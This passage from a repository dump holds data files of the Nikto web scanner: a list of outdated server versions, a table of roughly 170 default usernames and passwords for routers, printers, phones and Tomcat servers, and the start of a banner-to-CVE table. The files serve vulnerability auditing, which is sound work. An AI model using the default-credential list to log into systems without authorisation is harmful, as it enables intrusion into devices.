least @CURRENT_VER)\"\n\"601168\",\"On-DemandRouter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601169\",\"PEARLWebshop/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601170\",\"PPS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601171\",\"PhobyxCluster/\",\"0.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601172\",\"PipeBoost/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601173\",\"Pizza/\",\"4cheese\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601174\",\"ROTOR/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601175\",\"RWS/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601176\",\"RapidbazLive/\",\"0.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601177\",\"RapidbazLiveFW/\",\"0.07\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601178\",\"Rediff/\",\"2.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601179\",\"Safe3WAF/\",\"6.4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601180\",\"IBM WebSphere sMash/\",\"1.1.1.6.141217\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601181\",\"SmugMug/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601182\",\"Snowball/\",\"5.2a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601184\",\"TinyURL/\",\"1.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601185\",\"UPWS/\",\"9.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601186\",\"USF-11/\",\"155\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601187\",\"UWS/\",\"0.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601188\",\"UltraBrutalServer/\",\"7.6112\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601189\",\"VXS/\",\"3.38\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601191\",\"W3TotalCache/\",\"0.9.1.4b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601192\",\"WebGUI/\",\"7.4.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601193\",\"WebMatrixiDCHTTPServer/\",\"8.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601194\",\"YEEPAY-WBS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601195\",\"YJSWS/\",\"0.8.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601196\",\"YLS/\",\"0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601197\",\"YServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601198\",\"YWS/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601199\",\"ZSWS/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601200\",\"ZendCore/\",\"2.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601201\",\"ZendServer/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601202\",\"alabout/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601203\",\"aliBeacon/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601204\",\"barista/\",\"3.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601205\",\"ddspn/\",\"0.8.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601206\",\"emuch/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601207\",\"ezot/\",\"3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601208\",\"follow5/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601209\",\"gevent/\",\"0.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601210\",\"iPad/\",\"8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601211\",\"ibibo-WS/\",\"2.2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601212\",\"iptoXGmbHHPC5/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601213\",\"k!/\",\"45.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601214\",\"kzserver/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601215\",\"magic_ponies/\",\"2.718\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601216\",\"mcdn/\",\"1.alpha\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601217\",\"mod_AliCookie/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601218\",\"mod_chxj/\",\"0.12.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601219\",\"mod_cinemark/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601220\",\"mod_defensible/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601221\",\"mod_evasive/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601223\",\"mod_onsint/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601224\",\"mod_ossl/\",\"10.1.3.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601225\",\"mod_rsp20/\",\"rsp_plugins_v15.08-07-29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601226\",\"mod_security2/\",\"2.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601227\",\"mod_ucam_webauth/\",\"2.0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601228\",\"mru_xml/\",\"0.471\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601229\",\"naukri.comnginx/\",\"0.7.62\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601230\",\"nfzmX/\",\"700607\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601231\",\"nginx-adamantsys/\",\"0.7.67\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601232\",\"nginx-catap/\",\"0.8.7.528.179136c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601233\",\"proxy_xml/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601234\",\"prxp_module/\",\"1.13.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601235\",\"psso_module/\",\"0.9.28\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601236\",\"pxg2_module/\",\"0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601237\",\"qip.mail/\",\"4.1.2120328.01.2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601238\",\"rackcorpcdn/\",\"1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601239\",\"sws/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601240\",\"uloztows/\",\"1.26.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601241\",\"xingyun/\",\"0.8.88\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601242\",\"yy365/\",\"0.8.88\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601243\",\"OwnServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601244\",\"MobileAdmin/\",\"7.0.15609\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601245\",\"ClearSCADA/\",\"6.71.4165.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601246\",\"Zscaler/\",\"3.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601247\",\"comForteSWAPWebServer/\",\"SLD_1055\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601248\",\"corpweb/\",\"3.3a.QEL4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601249\",\"CouchDB/\",\"1.0.2(ErlangOTP/R14B)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601250\",\"FreeBSDHost-WebServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601252\",\"ISYSSearchServer/\",\"9.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601253\",\"MLDonkey/\",\"3.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601254\",\"mod_hive/\",\"1.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601255\",\"MX4J-HTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601256\",\"Speedr/\",\"0.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601257\",\"Apache-ADTI/\",\"1.3.41\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601258\",\"EvoWebBase/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601259\",\"Mohican/\",\"127.0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601260\",\"NetJetEngine/\",\"2.29646EB013568\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601261\",\"OCP/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601262\",\"Progressive/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601263\",\"River/\",\"2.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601264\",\"SiteWelder/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601265\",\"SmallWebServer/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601266\",\"VWS/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601267\",\"WebContainer/\",\"4.2.4.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601268\",\"mod_auth_gforge/\",\"0.5.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601269\",\"mod_extfilter/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601271\",\"mod_pwdir/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601272\",\"mod_security/\",\"1.8.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601273\",\"mod_suid/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601274\",\"srp/\",\"2.c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601275\",\"Jetty/\",\"12.0.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Jetty 10.0.6 AND 9.4.41.v20210516 are also currently supported.\"\n\"601276\",\"Jetty\\(\",\"9.4.41.v20210516\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Jetty 10.0.6 AND 9.4.41.v20210516 are also currently supported.\"\n\"601277\",\"Sawmill/\",\"8.7.7.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"601279\",\"Jetty/winstone-\",\"2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"601280\",\"KDH\",\"2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"601281\",\"Alpha Anywhere Application Server/12.0 Build/\",\"9906-5725\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n"
  },
  {
    "path": "program/databases/db_realms",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# format: realm,id,password,message\n# @ANY = match any realm name (generic)\n# If ID and PW fields are blank, realm match is used for message only\n########################################################################\n\"nikto_id\",\"realm\",\"id\",\"password\",\"message\"\n\"700000\",\"@ANY\",\"\",\"_Cisco\",\"Cisco device\"\n\"700001\",\"@ANY\",\"\",\"0\",\"Accton wireless router\"\n\"700002\",\"@ANY\",\"\",\"0000\",\"Deutsche Telekomm T-Sinus 130 DSL\"\n\"700003\",\"@ANY\",\"\",\"00000000\",\"Konica/Minolta Di 2010f\"\n\"700004\",\"@ANY\",\"\",\"12345\",\"US Robotics modem\"\n\"700005\",\"@ANY\",\"\",\"admin\",\"Generic account discovered\"\n\"700006\",\"@ANY\",\"\",\"Administrative\",\"Avenger News System\"\n\"700007\",\"@ANY\",\"\",\"cisco\",\"Cisco device\"\n\"700008\",\"@ANY\",\"\",\"Cisco\",\"Cisco device\"\n\"700009\",\"@ANY\",\"\",\"connect\",\"Fujitsu Siemens\"\n\"700010\",\"@ANY\",\"\",\"epicrouter\",\"Conexant Router\"\n\"700011\",\"@ANY\",\"\",\"intermec\",\"Intermec EasyLAN\"\n\"700012\",\"@ANY\",\"\",\"PASSWORD\",\"Kyocera EcoLink\"\n\"700013\",\"@ANY\",\"\",\"password\",\"NRG/Ricoh printer\"\n\"700014\",\"@ANY\",\"\",\"smcadmin\",\"SMC Router\"\n\"700015\",\"@ANY\",\"\",\"Symbol\",\"Symbol Spectrum\"\n\"700016\",\"@ANY\",\"\",\"TANDBERG\",\"Tandberg device\"\n\"700017\",\"@ANY\",\"\",\"x6zynd56\",\"Polycom ViewStation\"\n\"700018\",\"@ANY\",\"1502\",\"1502\",\"X-Micro WLAN 11b router\"\n\"700019\",\"@ANY\",\"admin\",\"\",\"Generic account discovered\"\n\"700020\",\"@ANY\",\"admin\",\"0000\",\"Infosmart SOHO router\"\n\"700021\",\"@ANY\",\"admin\",\"1111\",\"Xerox WorkCentre Pro\"\n\"700022\",\"@ANY\",\"admin\",\"1234\",\"Generic account discovered\"\n\"700023\",\"@ANY\",\"admin\",\"1234\",\"ZyXEL Prestige\"\n\"700024\",\"@ANY\",\"admin\",\"22222\",\"Xerox DocuCentre 425\"\n\"700025\",\"@ANY\",\"admin\",\"admin\",\"Generic account discovered.\"\n\"700026\",\"@ANY\",\"admin\",\"administrator\",\"Efficient Speedstream\"\n\"700027\",\"@ANY\",\"admin\",\"articon\",\"Blue Coat systems\"\n\"700028\",\"@ANY\",\"admin\",\"asd\",\"NGSec NGSecureWeb\"\n\"700029\",\"@ANY\",\"admin\",\"barney\",\"Avaya SIP telephone\"\n\"700030\",\"@ANY\",\"admin\",\"barricade\",\"SMC Barricade 7401BRA\"\n\"700031\",\"@ANY\",\"admin\",\"demo\",\"OpenMarket Content Server\"\n\"700032\",\"@ANY\",\"admin\",\"epicrouter\",\"Generic account discovered\"\n\"700033\",\"@ANY\",\"admin\",\"hagpolm1\",\"Siemens SpeedStream 4100\"\n\"700034\",\"@ANY\",\"admin\",\"hp.com\",\"Hewlett-Packard webmin\"\n\"700035\",\"@ANY\",\"Admin\",\"ImageFolio\",\"BizDesign ImageFolio\"\n\"700036\",\"@ANY\",\"admin\",\"ironport\",\"IronPrt C30\"\n\"700037\",\"Motive Chorus\",\"admin\",\"isee\",\"Hewlett-Packard Motive Chorus\"\n\"700038\",\"@ANY\",\"admin\",\"linga\",\"Alteon ACEswitch 180e\"\n\"700039\",\"@ANY\",\"admin\",\"motorola\",\"Motorola wireless router\"\n\"700040\",\"@ANY\",\"admin\",\"mp3mystic\",\"MP3Mystic\"\n\"700041\",\"@ANY\",\"admin\",\"muze\",\"Muze Ariadne\"\n\"700042\",\"@ANY\",\"admin\",\"netadmin\",\"Enterasys ANG-1105\"\n\"700043\",\"@ANY\",\"admin\",\"operator\",\"iPSTAR Satellite\"\n\"700044\",\"@ANY\",\"admin\",\"password\",\"Generic account discovered\"\n\"700045\",\"@ANY\",\"admin\",\"secure\",\"Generic account discovered\"\n\"700046\",\"@ANY\",\"admin\",\"setup\",\"Nortel Contivity\"\n\"700047\",\"@ANY\",\"admin\",\"smallbusiness\",\"Pirelli AGE-SB\"\n\"700048\",\"@ANY\",\"admin\",\"smcadmin\",\"SMC Barricade 7204BRB\"\n\"700049\",\"@ANY\",\"admin\",\"synnet\",\"3COM CellPlex\"\n\"700050\",\"@ANY\",\"admin\",\"TANDBERG\",\"Tandberg device\"\n\"700051\",\"@ANY\",\"admin\",\"tomcat\",\"Apache Tomcat\"\n\"700052\",\"@ANY\",\"admin@example.com\",\"admin\",\"MySQL Eventum\"\n\"700053\",\"@ANY\",\"Administrator\",\"\",\"Generic account discovered\"\n\"700054\",\"@ANY\",\"administrator\",\"**#\",\"Polycom Soundstation IP\"\n\"700055\",\"@ANY\",\"Administrator\",\"0000\",\"Snom VoIP business phone\"\n\"700056\",\"@ANY\",\"Administrator\",\"1234\",\"Integrated Networks IP Phone\"\n\"700057\",\"@ANY\",\"administrator\",\"1234\",\"IntelliTouch Voip Broadband phone\"\n\"700058\",\"@ANY\",\"Administrator\",\"12345678\",\"Integrated Networks IP Phone\"\n\"700059\",\"@ANY\",\"Administrator\",\"19750407\",\"Luxon Communications/Integrated Networks IP Phone\"\n\"700060\",\"@ANY\",\"Administrator\",\"admin\",\"Generic account discovered\"\n\"700061\",\"@ANY\",\"administrator\",\"administrator\",\"Compaq WBEM\"\n\"700062\",\"@ANY\",\"administrator\",\"administrator\",\"Generic account discovered.\"\n\"700063\",\"@ANY\",\"administrator\",\"adminpass\",\"NessusWeb\"\n\"700064\",\"@ANY\",\"AdvWebadmin\",\"advcomm500349\",\"Hosting Controller\"\n\"700065\",\"@ANY\",\"anonymous\",\"\",\"Sambar Server\"\n\"700066\",\"@ANY\",\"apc\",\"apc\",\"APC UPS\"\n\"700067\",\"@ANY\",\"billy-bob\",\"\",\"Sambar Server\"\n\"700068\",\"@ANY\",\"Bobo\",\"hello\",\"OpenMarket Content Server\"\n\"700069\",\"@ANY\",\"cac_admin\",\"cacadmin\",\"Openwave MSP\"\n\"700070\",\"@ANY\",\"Cisco\",\"Cisco\",\"Cisco device\"\n\"700071\",\"@ANY\",\"Coco\",\"hello\",\"OpenMarket Content Server\"\n\"700072\",\"@ANY\",\"customer\",\"\",\"Aspect ACD\"\n\"700073\",\"@ANY\",\"device\",\"device\",\"APC UPS\"\n\"700074\",\"@ANY\",\"e250\",\"e250changeme\",\"Network Associates WebShield Security Appliance e250\"\n\"700075\",\"@ANY\",\"e500\",\"e500changeme\",\"Network Associates WebShield Security Appliance e500\"\n\"700076\",\"@ANY\",\"Flo\",\"hello\",\"OpenMarket Content Server\"\n\"700077\",\"@ANY\",\"ftp\",\"\",\"Sambar Server\"\n\"700078\",\"@ANY\",\"guest\",\"\",\"Generic account discovered\"\n\"700079\",\"@ANY\",\"guest\",\"guest\",\"Generic account discovered.\"\n\"700080\",\"@ANY\",\"intel\",\"intel\",\"Intel wireless gateway\"\n\"700081\",\"@ANY\",\"jagadmin\",\"\",\"Sybase EAServer\"\n\"700082\",\"@ANY\",\"Jetform\",\"\",\"Jetform Design\"\n\"700083\",\"@ANY\",\"Joe\",\"hello\",\"OpenMarket Content Server\"\n\"700084\",\"@ANY\",\"LDAP_Anonymous\",\"LdapPassword_1\",\"Microsoft SiteServer\"\n\"700085\",\"@ANY\",\"manager\",\"admin\",\"Allied Telesyn switch\"\n\"700086\",\"@ANY\",\"Manager\",\"fried\",\"Allied Telesyn router\"\n\"700087\",\"@ANY\",\"Moe\",\"hello\",\"OpenMarket Content Server\"\n\"700088\",\"@ANY\",\"naadmin\",\"naadmin\",\"NetGenesis NetAnalysis Web Reporting\"\n\"700089\",\"@ANY\",\"operator\",\"\",\"Magicolor 3100\"\n\"700090\",\"@ANY\",\"operator\",\"$schwarzepumpe\",\"Intershop\"\n\"700091\",\"@ANY\",\"piranha\",\"piranha\",\"Redhat 6.2\"\n\"700092\",\"@ANY\",\"piranha\",\"q\",\"Redhat 6.2\"\n\"700093\",\"@ANY\",\"Polycom\",\"SpIp\",\"Polycom Soundpoint VoIP phones\"\n\"700094\",\"@ANY\",\"public\",\"public\",\"Samsung Router\"\n\"700095\",\"@ANY\",\"role\",\"changethis\",\"Apache Tomcat\"\n\"700096\",\"@ANY\",\"role1\",\"role1\",\"Apache Tomcat\"\n\"700097\",\"@ANY\",\"Root\",\"\",\"3COM Netbuilder\"\n\"700098\",\"@ANY\",\"root\",\"\",\"Generic account discovered\"\n\"700099\",\"@ANY\",\"root\",\"calvin\",\"Dell Remote Access Card\"\n\"700100\",\"@ANY\",\"root\",\"changeme\",\"Sun Microsystems ILOM/X4100\"\n\"700101\",\"@ANY\",\"root\",\"changethis\",\"Apache Tomcat\"\n\"700102\",\"@ANY\",\"tomcat\",\"s3cret\",\"Apache Tomcat\"\n\"700103\",\"@ANY\",\"root\",\"Cisco\",\"Cisco device\"\n\"700104\",\"@ANY\",\"root\",\"nsi\",\"NSI vmXfw\"\n\"700105\",\"@ANY\",\"root\",\"pass\",\"Axis Webcams\"\n\"700106\",\"@ANY\",\"root\",\"password\",\"BestPractical RT\"\n\"700107\",\"@ANY\",\"root\",\"root\",\"Apache Tomcat\"\n\"700108\",\"@ANY\",\"root\",\"root\",\"Generic account discovered\"\n\"700109\",\"@ANY\",\"root\",\"tslinux\",\"Cyclades TS800\"\n\"700110\",\"@ANY\",\"sadmin\",\"\",\"Novell NDS iMonitor\"\n\"700111\",\"@ANY\",\"smc\",\"smcadmin\",\"SMC Barricade 7401BRA\"\n\"700112\",\"@ANY\",\"storwatch\",\"specialist\",\"IBM TotalStorage\"\n\"700113\",\"@ANY\",\"super\",\"5777364\",\"Netgear wireless gateway\"\n\"700114\",\"@ANY\",\"superadmin\",\"secret\",\"IBM Web administration tool\"\n\"700115\",\"@ANY\",\"superman\",\"21241036\",\"Netgear wireless gateway\"\n\"700116\",\"@ANY\",\"superuser\",\"admin\",\"Efficient Speedstream\"\n\"700117\",\"@ANY\",\"supervisor\",\"PlsChgMe\",\"Nortel Business Communications Manager\"\n\"700118\",\"@ANY\",\"support\",\"h179350\",\"Psion Teklogix 9150\"\n\"700119\",\"@ANY\",\"sys\",\"uplink\",\"Openwave WAP gateway\"\n\"700120\",\"@ANY\",\"sysadmin\",\"password\",\"Ricoh Aficio\"\n\"700121\",\"@ANY\",\"system\",\"password\",\"Mitel 3300 ICP\"\n\"700122\",\"@ANY\",\"test\",\"test\",\"Generic account discovered.\"\n\"700123\",\"@ANY\",\"tomcat\",\"changethis\",\"Apache Tomcat\"\n\"700124\",\"@ANY\",\"tomcat\",\"tomcat\",\"Apache Tomcat\"\n\"700125\",\"@ANY\",\"user_analyst\",\"demo\",\"OpenMarket Content Server\"\n\"700126\",\"@ANY\",\"user_approver\",\"demo\",\"OpenMarket Content Server\"\n\"700127\",\"@ANY\",\"user_author\",\"demo\",\"OpenMarket Content Server\"\n\"700128\",\"@ANY\",\"user_checker\",\"demo\",\"OpenMarket Content Server\"\n\"700129\",\"@ANY\",\"user_designer\",\"demo\",\"OpenMarket Content Server\"\n\"700130\",\"@ANY\",\"user_editor\",\"demo\",\"OpenMarket Content Server\"\n\"700131\",\"@ANY\",\"user_expert\",\"demo\",\"OpenMarket Content Server\"\n\"700132\",\"@ANY\",\"user_marketer\",\"demo\",\"OpenMarket Content Server\"\n\"700133\",\"@ANY\",\"user_pricer\",\"demo\",\"OpenMarket Content Server\"\n\"700134\",\"@ANY\",\"user_publisher\",\"demo\",\"OpenMarket Content Server\"\n\"700135\",\"@ANY\",\"user\",\"\",\"D-Link router\"\n\"700136\",\"@ANY\",\"User\",\"\",\"D-Link router\"\n\"700137\",\"@ANY\",\"webadmin\",\"1234\",\"ZyXEL Prestige\"\n\"700138\",\"@ANY\",\"webadmin\",\"webadmin\",\"Broadlogic XLT router\"\n\"700139\",\"@ANY\",\"websecadm\",\"changeme\",\"Entrust getAccess\"\n\"700140\",\"ConfigToolPassword\",,,\"Realm matches a Nokia Checkpoint Firewall-1\"\n\"700141\",\"daap\",\"\",\"\",\"DAAP (iTunes?) server with authentication.\"\n\"700142\",\"EIC\",\"root\",\"ncr\",\"Enterprise Intranet Configurator - NCR Teradata server\"\n\"700143\",\"Entrust GetAccess SCA\",\"admin\",\"admin\",\"Entrust GetAccess Service Control Agent\"\n\"700144\",\"hp print server appliance\",\"admin\",\"admin\",\"HP Print Server\"\n\"700145\",\"InterScanVirusWall\",\"admin\",\"admin\",\"Trend Micro's InterScan Virus Wall\"\n\"700146\",\"Monitor or Admin\",\"admin\",\"\",\"StorageTek's StorageNet, ID 'admin' with no password\"\n\"700147\",\"Monitor or Admin\",\"monitor\",\"\",\"StorageTek's StorageNet, ID monitor' with no password\"\n\"700148\",\"Netscape Administration\",\"admin\",\"admin\",\"Netscape server administration\"\n\"700149\",\"Netscape Mission Control\",\"admin\",\"admin\",\"Netscape server administration\"\n\"700150\",\"Topaz Prism Site\",\"admin\",\"admin\",\"Topaz Prism monitoring from Mercurity Interactive\"\n\"700151\",\"Topaz Site Realm\",\"admin\",\"admin\",\"Mercury Interactive Topaz administrator\"\n\"700152\",\"UpgradeAdministrator\",\"admin\",\"ncr\",\"NCR's Terradata server, Parallel Upgrade Tool (PUT)\"\n\"700153\",\"@ANY\",\"manager\",\"manager\",\"3com switch/Apache Tomcat\"\n\"700154\",\"Linksys WAG160N \",\"\",\"admin\",\"Wireless-N ADSL2+ Gateway WAG160N\"\n\"700155\",\"@ANY\",\"tomcat\",\"\",\"Apache Tomcat\"\n\"700156\",\"@ANY\",\"j2deployer\",\"j2deployer\",\"Apache Tomcat\"\n\"700157\",\"@ANY\",\"ovwebusr\",\"OvW*busr1\",\"Apache Tomcat\"\n\"700158\",\"@ANY\",\"cxsdk\",\"kdsxc\",\"Apache Tomcat\"\n\"700159\",\"@ANY\",\"root\",\"owaspbwa\",\"Apache Tomcat\"\n\"700160\",\"@ANY\",\"ADMIN\",\"ADMIN\",\"Apache Tomcat\"\n\"700161\",\"@ANY\",\"xampp\",\"xampp\",\"Apache Tomcat\"\n\"700162\",\"@ANY\",\"QCC\",\"QLogic66\",\"Apache Tomcat\"\n\"700163\",\"@ANY\",\"both\",\"tomcat\",\"Apache Tomcat\"\n\"700164\",\"@ANY\",\"role1\",\"tomcat\",\"Apache Tomcat\"\n\"700165\",\"@ANY\",\"admin\",\"changethis\",\"Apache Tomcat\"\n\"700166\",\"SPIP Configuration\",\"Polycom\",\"456\",\"Polycom SoundStation/SoundPoint IP\"\n\"700167\",\"@ANY\",\"username\",\"password\",\"ComfortableMexicanSofa CMS Engine\"\n\"700168\",\"OSGi Management Console\",\"admin\",\"admin\",\"Adobe Experience Manager default password found\"\n\"700169\",\"Power+ (default: admin/admin)\",\"admin\",\"admin\",\"Gamatronic Power+ default password found\"\n"
  },
  {
    "path": "program/databases/db_server_msgs",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n\"nikto_id\",\"server\",\"reference\",\"message\"\n\"800000\",\"4D_WebSTAR_S\\/5\\.([0-2]|3\\.[0-2])\",\"CVE-2004-0696\",\"May be vulnerable to multiple flaws.\"\n\"800001\",\"4D_WebSTAR_S\\/5\\.([0-2]|3\\.[01])\",\"\",\"May be vulnerable to denial of service through an OpenSSL implementation bug.\"\n\"800002\",\"4D_WebSTAR_S\\/5\\.([0-3]|4[^.])\",\"CVE-2005-1507\",\"May be vulnerable to a buffer overflow in Tomcat plugin 